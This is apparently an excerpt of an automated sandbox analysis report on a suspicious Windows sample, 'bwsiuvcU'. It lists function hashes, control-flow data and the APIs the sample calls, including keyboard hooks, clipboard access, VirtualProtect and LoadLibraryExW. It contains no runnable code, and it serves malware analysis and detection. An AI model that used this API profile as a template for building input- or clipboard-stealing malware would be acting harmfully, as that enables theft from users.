                                                                                                                            • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                            • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                            • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                            • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1051 411b4f90-411b4fb4 1053 411b4fb6-411b4fb9 1051->1053 1054 411b4fbb-411b4ff0 1053->1054 1055 411b4ff5-411b4ff8 1053->1055 1054->1055 1056 411b4ffa 1055->1056 1057 411b5008-411b500b 1055->1057 1081 411b4ffa call 411b607b 1056->1081 1082 411b4ffa call 411b5968 1056->1082 1058 411b503e-411b5041 1057->1058 1059 411b500d-411b5021 1057->1059 1060 411b5043-411b504a 1058->1060 1061 411b5055-411b5057 1058->1061 1069 411b5023-411b5025 1059->1069 1070 411b5027 1059->1070 1063 411b5119-411b511f 1060->1063 1064 411b5050 1060->1064 1065 411b5059 1061->1065 1066 411b505e-411b5061 1061->1066 1062 411b5000-411b5003 1062->1057 1064->1061 1065->1066 1066->1053 1068 411b5067-411b5076 1066->1068 1074 411b5078-411b509e 1068->1074 1075 411b50a0-411b50b6 1068->1075 1071 411b502a-411b5039 1069->1071 1070->1071 1071->1058 1074->1075 1075->1063 1081->1062 1082->1062
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,@@A$,@@A$LRq
                                                                                                                            • API String ID: 0-2996645422
                                                                                                                            • Opcode ID: 68157d8cf09833af7ca0f6c0faeb1fb162b662ddb220e9179c188e9dab766916
                                                                                                                            • Instruction ID: 4a7416bc43c76c9b28e42677bd0641ed2f5df94aa239105c46cc613c17732384
                                                                                                                            • Opcode Fuzzy Hash: 68157d8cf09833af7ca0f6c0faeb1fb162b662ddb220e9179c188e9dab766916
                                                                                                                            • Instruction Fuzzy Hash: D6318F70E11209DBEB55DFA9C48478EBBB1FF89340F118529E816FB250EBB19D428B85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,@@A$,@@A$LRq
                                                                                                                            • API String ID: 0-2996645422
                                                                                                                            • Opcode ID: 53cb6d577a136b444cdb76c4103a1682c57f79eb7197c2edd2c68ff285c21249
                                                                                                                            • Instruction ID: 468b85f33c4984eaed66dff1d3266cafe24a4527428d2a6f482f5038347fff02
                                                                                                                            • Opcode Fuzzy Hash: 53cb6d577a136b444cdb76c4103a1682c57f79eb7197c2edd2c68ff285c21249
                                                                                                                            • Instruction Fuzzy Hash: 45319030E11209DBDB45CFA9C48078EB7B1FF89300F118529E806FB240EB719D41CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Lf@A$Lf@A$N@AU
                                                                                                                            • API String ID: 0-380423495
                                                                                                                            • Opcode ID: fa5d26fa4738606e99e5b7e6f616329148eff1655ab600558d794f474ee51c02
                                                                                                                            • Instruction ID: df35f07523dfbce3d687515bb443064c239fd95b09cd9baa8e0e1e4ae1aef927
                                                                                                                            • Opcode Fuzzy Hash: fa5d26fa4738606e99e5b7e6f616329148eff1655ab600558d794f474ee51c02
                                                                                                                            • Instruction Fuzzy Hash: AB21E430A10304DFDB45EBB5E99129D7F72AF81304F1045F9C406DB286EE319E0AC782
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683993706.0000000041450000.00000040.00000800.00020000.00000000.sdmp, Offset: 41450000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41450000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: d@A
                                                                                                                            • API String ID: 0-4044796269
                                                                                                                            • Opcode ID: 53760b8f2ce90c3a5c8ff2782b4ca90afd44e21f1ab0402bd5920cba9a9b9b87
                                                                                                                            • Instruction ID: 7d58051a400b615f462c83899fcc24133e40632dbd36fb21335190bc410a79a5
                                                                                                                            • Opcode Fuzzy Hash: 53760b8f2ce90c3a5c8ff2782b4ca90afd44e21f1ab0402bd5920cba9a9b9b87
                                                                                                                            • Instruction Fuzzy Hash: EF413572D083868FDB04CB75C80069EBFF1EF8A210F1585ABD595E7291DB749846CBE1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,41D6534A,00000000,00000000,3EDE4100,3DE0C974), ref: 41D65B98
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePeek
                                                                                                                            • String ID: |$@A
                                                                                                                            • API String ID: 2222842502-3461025799
                                                                                                                            • Opcode ID: 2d0d465a6f4efe63faa89b944040ceddabf19a86015dbde703023c7d59a14bb6
                                                                                                                            • Instruction ID: 8488e6519f446ba8478575bd1c606657ae14a3f88f087a1e0eaf22d73a13d281
                                                                                                                            • Opcode Fuzzy Hash: 2d0d465a6f4efe63faa89b944040ceddabf19a86015dbde703023c7d59a14bb6
                                                                                                                            • Instruction Fuzzy Hash: 311114B5C002499FDB10CF9AD940BDEBBF8EB08320F10842AE958A3250C378A940CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: 9e9a2baaaf36d7b222130a5475991787e9e4bc75892a378d820801bb3f3d635d
                                                                                                                            • Instruction ID: d69a9bd311622bc39c2f8bedaf130343efe30ed45479ae62767a1fb74c7d4b45
                                                                                                                            • Opcode Fuzzy Hash: 9e9a2baaaf36d7b222130a5475991787e9e4bc75892a378d820801bb3f3d635d
                                                                                                                            • Instruction Fuzzy Hash: 1D316F35F102169BCB09DFB5C85469EBBB6AF8A310F108569E806EB340EF70DD42CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: a2a12e3941d242d8df0ac387f781e9a0d984dbfe4a3997b259007e2b4d4632cd
                                                                                                                            • Instruction ID: d660e7f84fe2ba8f408f091e22e362925f3c4013e8f41b9c8a99635a45509c41
                                                                                                                            • Opcode Fuzzy Hash: a2a12e3941d242d8df0ac387f781e9a0d984dbfe4a3997b259007e2b4d4632cd
                                                                                                                            • Instruction Fuzzy Hash: 09314F34F0161A9BCB09DBA5C85469EBBB6AF8A310F108569E805EB344EF70DD42CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: 670f5be02ab932e1b773d6d536d65ed639ea89f66624c9ba60a54ef1c7c3a01e
                                                                                                                            • Instruction ID: 89ef681cecb5dcb9fd5bce9809172c6bfaf7b20db27df5f0bed374550ac22ec3
                                                                                                                            • Opcode Fuzzy Hash: 670f5be02ab932e1b773d6d536d65ed639ea89f66624c9ba60a54ef1c7c3a01e
                                                                                                                            • Instruction Fuzzy Hash: 2B31B270E102199BDB09CF65C48039EBBBAFF89300F108529E802EB341EB71EC46CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: b48d3f3ec734021e99d1cf16102ade7135fa58bc76874ccb72f3d8acaa1f5a9f
                                                                                                                            • Instruction ID: f7c8c013efc5070a4262cb3e00af04f545d7a18ba0227c41bb6e67c97b69f686
                                                                                                                            • Opcode Fuzzy Hash: b48d3f3ec734021e99d1cf16102ade7135fa58bc76874ccb72f3d8acaa1f5a9f
                                                                                                                            • Instruction Fuzzy Hash: EC319170E002199BDB09CF65D49079EBBB6BF89300F118529E806FB341EB719D468B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: pr@A$pr@A
                                                                                                                            • API String ID: 0-2172208707
                                                                                                                            • Opcode ID: df5925f805e631bd295928d8518badd7e87c9a02098b0b2f9b1324f3a7bb30b9
                                                                                                                            • Instruction ID: 63d274fe7785f3f58fe852b8ea12fae039595f64063599b23cd53d70bf572101
                                                                                                                            • Opcode Fuzzy Hash: df5925f805e631bd295928d8518badd7e87c9a02098b0b2f9b1324f3a7bb30b9
                                                                                                                            • Instruction Fuzzy Hash: CF21B230E142159BDB09CF65C45069EBBB2BF89310F10852AE912FB380EB709846CB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: pr@A$pr@A
                                                                                                                            • API String ID: 0-2172208707
                                                                                                                            • Opcode ID: 3c32e93fe90a4d71ce0bb5345cd18c69fcc94bde485d4b9553bc7fb2d85938bc
                                                                                                                            • Instruction ID: 25dd690787cfb3db810d60d5a109109c5428761bc52d25e809f2f249f0dadf61
                                                                                                                            • Opcode Fuzzy Hash: 3c32e93fe90a4d71ce0bb5345cd18c69fcc94bde485d4b9553bc7fb2d85938bc
                                                                                                                            • Instruction Fuzzy Hash: 39219230E112199BCB09CFA5C45069EBBB2BF89710F11862AE912FB380EF719D45CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Lf@A$Lf@A
                                                                                                                            • API String ID: 0-274663137
                                                                                                                            • Opcode ID: 72e1591d0df6c398fd70794b1522a00462f00f3da6a9fcd13e56b2e90709c991
                                                                                                                            • Instruction ID: 09769007eb26b4c4b4fcdae51e9a22ba965a208835b9d677bcaf4b8fcdbdc7ae
                                                                                                                            • Opcode Fuzzy Hash: 72e1591d0df6c398fd70794b1522a00462f00f3da6a9fcd13e56b2e90709c991
                                                                                                                            • Instruction Fuzzy Hash: E5013634910318AFDF44EBF9E95569D7FB2AF80304F1086A8C505AB299EE706F168792
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 41A32D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: ad7860063de98bab60a1af55de18d1dd64cf5e8baccb7eae24d6150ef2d35248
                                                                                                                            • Instruction ID: 156081bc68315c14f50cb73dd929e1bfe647025f204deea59337621594e02af0
                                                                                                                            • Opcode Fuzzy Hash: ad7860063de98bab60a1af55de18d1dd64cf5e8baccb7eae24d6150ef2d35248
                                                                                                                            • Instruction Fuzzy Hash: C441BEB1C103499FDB14CF9AD884ADEBFB5FF88354F24812AE819AB250D775A845CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 41A32D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: bbc907b36a5c380932a4d289ba41e050a7899af1b574e83bccbc42a3536125fd
                                                                                                                            • Instruction ID: 360474837f951d582640cb438d2f3d9edb86a6acddd8441c5de1bda858e39049
                                                                                                                            • Opcode Fuzzy Hash: bbc907b36a5c380932a4d289ba41e050a7899af1b574e83bccbc42a3536125fd
                                                                                                                            • Instruction Fuzzy Hash: 6941CEB1C10349DFDB14CF9AD884ADEBFB5BF88354F24812AE819AB250D775A845CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 41A37B39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallProcWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2714655100-0
                                                                                                                            • Opcode ID: a4ada090691d0411c20c0184cfc9147e1f8e55c2f53809e2b1a7c69eeeaaff24
                                                                                                                            • Instruction ID: 1666c34abf506998b0dfbdf2dc07238d695d87bcc6b320e828274a40245483ab
                                                                                                                            • Opcode Fuzzy Hash: a4ada090691d0411c20c0184cfc9147e1f8e55c2f53809e2b1a7c69eeeaaff24
                                                                                                                            • Instruction Fuzzy Hash: 6C4126B4900749DFDB14CF96C484B9ABBF5FB88314F25C459E519AB360C774A941CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,41A37D85), ref: 41A37E0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 5723653539fd5542e674c9961755a0f616487545cb4f3962efdb42a038b5bb54
                                                                                                                            • Instruction ID: 423fdb8c8390bc86a7418e891105d5500ad9edb92fe136955b2333c2478cc423
                                                                                                                            • Opcode Fuzzy Hash: 5723653539fd5542e674c9961755a0f616487545cb4f3962efdb42a038b5bb54
                                                                                                                            • Instruction Fuzzy Hash: 46212775B016148BE715A7F8D41035EB6E6EBC9324F22843AD20AD7391EE35DC45CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 220874293-0
                                                                                                                            • Opcode ID: d7be4453ec04a562e364d1fe63519f25b1a81de4c1742b7993644a439d5e929c
                                                                                                                            • Instruction ID: da227b5f0dfb732cd639c2bf89e79ab8c361ad156ba0d8dc4a27e5fedeef2586
                                                                                                                            • Opcode Fuzzy Hash: d7be4453ec04a562e364d1fe63519f25b1a81de4c1742b7993644a439d5e929c
                                                                                                                            • Instruction Fuzzy Hash: B33102B0D01258DFEB24CF99D984B8DBBF1BF88314F208069E404AB291D775A845CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 220874293-0
                                                                                                                            • Opcode ID: fae10cbcc00bd9ef9efa1f26794e7f3dcfa48cf8ea248aeab0f06f4cfb9410e9
                                                                                                                            • Instruction ID: aa7560852a1c5c5142787f556f23f885ef0363ebcd410dd26a4e54366757c964
                                                                                                                            • Opcode Fuzzy Hash: fae10cbcc00bd9ef9efa1f26794e7f3dcfa48cf8ea248aeab0f06f4cfb9410e9
                                                                                                                            • Instruction Fuzzy Hash: 983103B0D4160CDFDB20CF99D984B8EBBF5AF88314F248069E004BB291D775A845CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 41A3686F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 50af8300c5cedbe44959e23f155747041da13d084a2be2dcc21d6924c9084ad4
                                                                                                                            • Instruction ID: 7bc11bc1f922a040b9356e20361b4118e362b24d2242b57c86766bb3d34634cf
                                                                                                                            • Opcode Fuzzy Hash: 50af8300c5cedbe44959e23f155747041da13d084a2be2dcc21d6924c9084ad4
                                                                                                                            • Instruction Fuzzy Hash: 4121E5B5D002489FDB10CF9AD985AEEBBF8EB48310F14841AE958A3250D378A941CF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 41A3686F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 7b4bdf9fd407549c7cdeae1a9616f6be3211d6d04f1110b67d821b8b5bdecd6a
                                                                                                                            • Instruction ID: 7ab3aeaf641f4f682c1c03b64b6c2ae965c0de08e0720b02baca3c05d10bb7bb
                                                                                                                            • Opcode Fuzzy Hash: 7b4bdf9fd407549c7cdeae1a9616f6be3211d6d04f1110b67d821b8b5bdecd6a
                                                                                                                            • Instruction Fuzzy Hash: 4421C4B5D002499FDB10CF9AD984ADEFFF4EB48310F14841AE958A3350D778A940CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,41A37D85), ref: 41A37E0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 264420072c1773345a88dfff676cc705efba4854d97e121f2b5ce7fc6b35d504
                                                                                                                            • Instruction ID: bf6d6b3c20a9354d7917c1e07b8fda98520022932805a2489f3a11016e84c5ed
                                                                                                                            • Opcode Fuzzy Hash: 264420072c1773345a88dfff676cc705efba4854d97e121f2b5ce7fc6b35d504
                                                                                                                            • Instruction Fuzzy Hash: 0021AEB0C043988FDB11DFA9D8447DEBFF4EF4A320F24409AD454AB251C3346849CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 41A3A0FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HookWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2559412058-0
                                                                                                                            • Opcode ID: f4ca6b4a6cef177ca5be676603463cdd8a97bac8c734a876674f0899ddbf7cb4
                                                                                                                            • Instruction ID: 53680c29af33b788f568d5c95e6d84fc7793f8db23b078fb7f77eb442e72f302
                                                                                                                            • Opcode Fuzzy Hash: f4ca6b4a6cef177ca5be676603463cdd8a97bac8c734a876674f0899ddbf7cb4
                                                                                                                            • Instruction Fuzzy Hash: 932134B5D002198FDB14DF9AC841BDEFBF5BB88320F10842AD428A7250C775A945CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 41A3A0FB
Memory Dump Source
• Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 3D94918C
Memory Dump Source
• Source File: 00000017.00000002.1679941832.000000003D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 3D940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_3d940000_bwsiuvcU.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,41D61359,00000800), ref: 41D613EA
Memory Dump Source
• Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,41D61359,00000800), ref: 41D613EA
Memory Dump Source
• Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,41D6534A,00000000,00000000,3EDE4100,3DE0C974), ref: 41D65B98
Memory Dump Source
• Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
Similarity
• API ID: MessagePeek
• String ID:
• API String ID: 2222842502-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 41A32526
Memory Dump Source
• Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 4145F9B7
Memory Dump Source
• Source File: 00000017.00000002.1683993706.0000000041450000.00000040.00000800.00020000.00000000.sdmp, Offset: 41450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_41450000_bwsiuvcU.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 41A32526
Memory Dump Source
• Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
Joe Sandbox IDA Plugin
